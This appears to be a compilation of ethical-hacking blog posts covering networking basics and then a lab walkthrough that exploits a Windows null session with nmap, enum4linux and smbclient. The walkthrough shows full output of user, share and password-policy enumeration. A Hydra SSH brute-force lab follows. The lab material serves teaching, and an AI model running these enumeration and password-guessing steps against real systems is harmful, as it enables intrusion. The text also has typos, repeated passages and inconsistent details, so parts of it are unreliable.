In a computer network, machines can communicate with each other by means of protocols.

This protocols ensures that computers can communicate with different hardware and software for their use. Largely different types of networks have these protocols on the Internet and each has its own purpose.
 

Do you know what the primary goal of networking is? Let us know about networking packets The primary goal of networking is to exchange information between computer networks, this information is carried by packets.

Packets

Packets are nothing but streams of bits used for data transmission over physical media as electric signals. Such media as a wire in a LAN ( local area network ) or the air in a WiFi network.

These electricals signals are then interpreted as bits ( zeros and ones ) that make up the information. Every packets in every protocol has the following structure.

The header has a protocol specific structure. This ensures that the receiving host can properly interpret the payload and handle the entire communication.

The header has a protocol specific structure. This ensures that the receiving host can properly interpret the payload and handle the entire communication.

This payload is the actual information so it could be something like part of an email messages what the content of a file during download of any messages.

Example The IP Header

For example, the internet protocol header is atleast 160 bits (20 bytes) long, and it includes  information to interpret the content of the IP packets.

Pic Credit Ine

The first four bits identify the Internet protocol (IP) version. Today they can be used to represent IP version 4 or 6.

Pic Credit Ine

The 32 bits starting at position 96 represent the source address.

Also read -  Master Local Area Network (LAN) Topologies In Just A Few Hours!

The following tour bytes represent the destination address.

Pic Credit Ine

Using the information in header, the nodes involved in the communication can understand and use IP packets.

Also read - Network Monitoring Tools HelpSystems Intermapper

Protocol layers

There are many protocols out there, each for a specific purpose.

Purpose like -

# Transmitting data.
# identifying computers on a network.
# Exchanging emails, files or performing VoIP calls.
# Establishing a communication between the a server and a client.




Instead of using specific examples, let's focusing on the features that a protocol provides-


# Use the physical media to send packets.
# identify hosts
# Make an application ( email client, FTP, browsers, ....) work.
# transport data between processes ( the server and the client programs ).




Moreover, we can rewrite the list again as:

# Application Layer
# Transport Layer
# Network Layer
# Physical Layer



These layers work on top of one another and every layer has its own protocols.


For example -

A few examples of application layer protocols are the Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Post Office Protocol (POP), Simple Mail Transfer Protocol (SMTP), and Domain Name System (DNS).
The application layer does not need to know how to identify a process on a host, how to reach it and how to use the copper wire to establish a communication.



It's just uses its underlying layers.

The OSI Model

The OSI (Open Systems Interconnection) Model is a standardised model which we use to demonstrate the theory behind computer networking. In practice, it's actually the more compact TCP/IP model that real-world networking is based off; however the OSI model, in many ways, is easier to get an initial understanding from. The OSI Model: An Overview

There are many mnemonics floating around to help you learn the layers of the OSI model -- search around until you find one that you like.



Let's briefly take a look at each of these in turn:

slowly scroll the iframe below

Also read - The TCP IP Model in Networking

Encapsulation

So let's know how the protocols work with each other.  If each protocol has header and payload, then how can the protocol use these lower layers?

The entire upper protocol packet ( header and payload ) is the payload of the lower one, this is called encapsulation.
TCP is the real world implementation of a networking stack and is the protocol stack used on the internet.

The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model. The TCP IP Model in Networking

You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.

For More Details Click on the below iframe slowly slowly -

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
  

Clear Text Protocol handles data over any network without any transformation or encryption. The attacker will eavesdrop on the communication which is performing an unwanted attack in a way.
 

Because whatever data is written in human languages, its nature's according cleartext protocol can be intercepted, eavesdrop and mangle very easily. Because the data that is being translated is not encrypted information on the boon network, public network or private network. If there is absolutely no alternative to a clear text protocol you should use it only on trusted network.


A cryptographic protocol provides services by encrypting any data or information over a network with tight security. Cryptographic protocols have many different goals one of them is to prevent is eavesdropping.

Eavesdropping that's mean is an attack also known as sniffing or snooping attack, is a theft of information as it is transmitted over the network by a computer, smartphone or another connected device that attackers takes advantage of unsecured network communications to access data as it is being sent or received by its user.


If an attacker intercept the traffic, they will not be able to understand it.
 

If you need to transmit private information such as username and password, then you should always use cryptographic protocol, this cryptographic protocol allows over the network communication with tight security.

What if you need to run a clear text protocol on an untrusted network?

You can wrap (tunnel) a clear text protocol into a cryptographic one.

A great example of protocol tunneling is a VPN.

A virtual Private Network (VPN) uses cryptography to extend a private network over the public one, like the internet. The extension is made by performing a protected connection to a private network (such as your office or home network). From the client point of view, being in the VPN is the same as being directly connected to the private network.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 

There is a deep well of information security because in the world which people prefer to use computer more than understand how it works and in what ways break any security.

The term hacker was born in the sixties in the MIT community. To such people, we can feel things like their inner curiosity, highly intelligent, strongly motivated. Information Security Field


The world of Infosec may hackers, keeping curiosity about the computer system and bypassing restrictions in new ways even software vendors for programmers and understanding any security pitfall of any kind of implementation.


Being able to attack also means being able to have an in-depth understanding of the techniques and workings of the target system. To be a hacker means you should have that hunger which is present in successful hackers today. Hackers explore and improve their skills daily.

There is always something new to learn something interesting to try for something exciting to Study

NOTE- The history of hacking could be a complete book in itself.

If you search the word hacking on the internet, then not only you will get the results of every word of the world of hacking.

Hacking is more of an approach or a lifestyle applied to telephone lines people and software development.


Becoming an information security professional means acquiring the knowledge of hacking with your own honesty and never stop challenging yourself and your colleagues.


Nowadays a big company or government store or processes any kind of confidential data using advanced technology on computer or mobile device.

The data is not only organized but also has to be transmitted from private network to public network or any other computer. It is a must to protect sensitive information. Companies pay a premium to safeguard their data and ensure that their systems are protected or atleast they should

Also read - CEHv10 Pentesting

Career opportunities

The even more important sectors is the national cyber security. Recently Government have to face a broad range of Cyber threats: global cyber syndicates hackers for hire activist terrorist and state sponsored hackers.

With critical infrastructure like power plants, trains, aeroplanes, or dams being controlled by computers using hacking skills for good has become critical for the safety of nations.

Companies and governments need it Implementing hardware and software defense systems to protect their digital assets.



At the same time, they are required to train every single employee in their entire organization-

# Secure applications are developed.
# Proper defensive measures are taken and
# That proper use of the companies data is in place.



IT Security is a very difficult game a way to ensure that a system is secure from cyber threats is by hiring your penetration Tester.



Penetration Tester is also known as penteseters are professionals who are hired to simulate a hacking attack against a network, computer system or a web application or the entire organisation.

They master the same tools and techniques that malicious hackers use to discover any and all vulnerability in the system they test.

Also read - CEHv10 Terminologies

These Highly skilled professionals often work-

# Work as a freelancer,
# In an IT security services company,
# As at work from home.

Moreover, as IT is a broad knowledge domain, they can specialize in specific infosec sectors such as:

# System attacks
# Web application attacks
# Malware analysis
# Reverse Engineering
# Android applications
# Others


Passionate, skillful and knowledge hungry is essential for a successful pentesting career.

Also read - What is Hacking ? is it illegal or legal ?

Information Security Terms

Speaking the domain language is fundamental in any field it helps you to better understand the industry and better communicate with your colleagues.

Also read - Information security terms

Root or Administrator

The root or Administrator users are the users who manage IT networks or single systems. They have the maximum privileges over a system.

Privileges

In a computer system, privileges identify the action that a user is allowed to do. The higher the privileges, the more the control over a systems a user has. Privileges escalation is an attack where a malicious user gains elevated privileges over a system.


 

Also read - DOS and DDOS Attack

Remote Code Execution

During a remote code execution attack a malicious user manager to execute some attacker controlled code on a victim remote machine. Remote code execution vulnerability is a very dangerous can be exploited over the network by remote attacker.

Also read - RCE practical here

ShellCode

A shell code is a piece of custom code which provides attack sale on the victim machine. Shellcodes are generally used during remote code execution attacks.

Disclaimer

The final goal of the blog is to tell you how to retrieve information from the target machine such as shares, users, groups and so on! Moreover by navigating the remote machine, you should be able to find a file name "Congratulations.txt\". Download it and explore its content.

A windows share machine can share a file or a directory on the network; this lets local and remote users access the resources and, possible, modify it. Eliminate Your Fears And Doubts About Null Session Attack

Example

A file server in an office lets users open and edit the document of their own departement, while it lets everyone read but modify public information files.

This features is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company.Shares can be either extremely useful if used properly or extremely dangerous when configured improperly.Creating network shares in a windows based environment is fairly easy. Generally uses just need to turn on the file and printer sharing services and then they can start using directories or files to share.

Users can also set permissions on a share showing who can perform operations such as reading and writing and modifying permissions. Starting from windows which the users can choose to share a single file or use the public directory when sharing a single file they can choose local or remote users to share the file with.When using the public directory they can choose which local users can access the files on the share but they can only allow everyone or no one in the network to access the share.




An authorised user can access share by using universal naming convention path (UNC path).


The Format of a UNC path is-

\\ServerName\ShareName\file.nat

Administrative shares

There are also some special default administrative shares which are used by system administrators and windows itself:

\\Computer Nmae\C$ lets and administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc).

\\ComputerName\admin$ points to the windows installation directory.

\\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via windows explorer.



You can test volume share and the admin$ share on your computer by entering the following on a windows explorer address bar


\\localhost\<sharename>

\\localhost\d$

 

Null session attacks can be used to enumerate write a lot of information. Attackers can steal information about-


# Passwords
# System Users
# System Group
# Running system processes


Null sessions remotely exploitable this means that attackers can use their computers to attack a vulnerable windows machine. Moreover, this can be used to call remotely API and remote procedure calls because of these factors Null session attack had a huge impact on windows ecosystem.

Nowadays is configured to be a immune from this kind of attack. However, legacy hosts can still be vulnerable.

A null session case and vulnerability for windows administrative shares, this lets an attacker and connect to a local or remote share without authentication.

We will go through the enumeration of windows shares and their exploitation by using various techniques and tools.

Tools

The best tools for this lab are:

# emun4linux
# samrdump
# smbclient

Steps

# Find a target in the network
# Check for null session
# Exploit null session

It\'s time to get our hands dirty.



# Gather information with enum4linux

Use enum4linux and gather the following information:

# Shares
# Users
# Password policies
# Groups



Use smbclient to navigate the target machine

Mount or use the smbclient interactive command line in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.

Find a target in the network

We first need to verify which the remote network is. We can do it by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2201  bytes 96326 (94.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2201  bytes 96326 (94.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
        ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 363 (363.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 522  bytes 22356 (21.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
        inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 92211  bytes 102634365 (97.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 55571  bytes 9521350 (9.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the previous screenshot). Let\'s run nmap in order to discover alive hosts on the network: 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).

Check for null session

Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

We can see that the File Server Service is active and the string \<20> appears in the list.

Exploit null session

It is time to get our hands dirty!

Gather information with enum4linux

Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.99.162    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient: 
[+] Got OS info for 192.168.99.162 from srvinfo:
        192.168.99.162 Wk Sv NT PtB LMB     
        platform_id     :       500
        os version      :       5.1
        server type     :       0x51003

 =============================== 
|    Users on 192.168.99.162    |
 =============================== 
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service

user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]

 =========================================== 
|    Share Enumeration on 192.168.99.162    |
 =========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------

[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/C      [E] Can't understand response:
  AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
  boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
  CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
  Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
  IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
  MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
  NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
  ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
  pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
  Program Files                      DR        0  Mon Oct  3 21:40:27 2016
  System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
  WINDOWS                             D        0  Mon Oct  3 21:42:49 2016

                785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$     Mapping: DENIED, Listing: N/A

 ====================================================== 
|    Password Policy Information for 192.168.99.162    |
 ====================================================== 


[+] Attaching to 192.168.99.162 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] ELS-WINXP
        [+] Builtin

[+] Password Info for Domain: ELS-WINXP

        [+] Minimum password length: None
        [+] Password history length: None
        [+] Maximum password age: 42 days 22 hours 47 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.99.162    |
 ================================ 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin

[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]

[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank

 ========================================================================= 
|    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''

 =============================================== 
|    Getting printer info for 192.168.99.162    |
 =============================================== 
Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE


enum4linux complete on Sun Dec 26 22:35:32 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see in the previous screenshots, we were able to gather a lot of information from the machine.

Use smbclient to navigate the target machine

A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

First let us get the list of shares using smbclient:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Let us now try to access the WorkSharing share and see what files are stored in there:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                               1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Feb 18 16:37:31 2015
  ..                                  D        0  Wed Feb 18 16:37:31 2015
  Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015

                785224 blocks of size 4096. 345613 blocks available
smb: \> 
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> 

As we can see in the previous screenshot there is a file namedCongratulations.txt. Let us download it into our machine and then use the cat command to display its content.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt                     
Congratulations! You have successfully exploited a null session!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Disclaimer

Representation

You are a Penetration Tester hired by the company Hacking Truth to perform Password cracking/Brute Force tests on their internal Web Application and machines after knowing usernames and some kind of security test. You are asked to perform the penetration test on the client premises.

Brute Force and Password Cracking Live on Metasploitable 2 via three different tools

In this metasploitable2 environment, we get access to a Kali GUI instance. An SSH server can be accessed using the tools installed on Kali on virtual machine

Objective: Perform the following activities:

1. Find the password of user "msfadmin" using Hydra. Use password dictionary: //home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt

2. Find the password of user "msfadmin" use appropriate Nmap script. Use password dictionary list bydefault: /usr/share/nmap/nselib/data/passwords.lst and the user list is here /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use userpass dictionary: /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Tools

The best tools for this lab are:

# Metasploit Framework
# Hydra
# Nmap

Check the interfaces present on the Kali machine.

Command - ifconfig

 

 There are interface eth0 available and the ip is 192.168.6.45.

Using Hydra

Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

Hydra

# Multi-threaded authentication brute force tool
# Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
# Written in C


Hydra help option

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -h                                                                                       
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
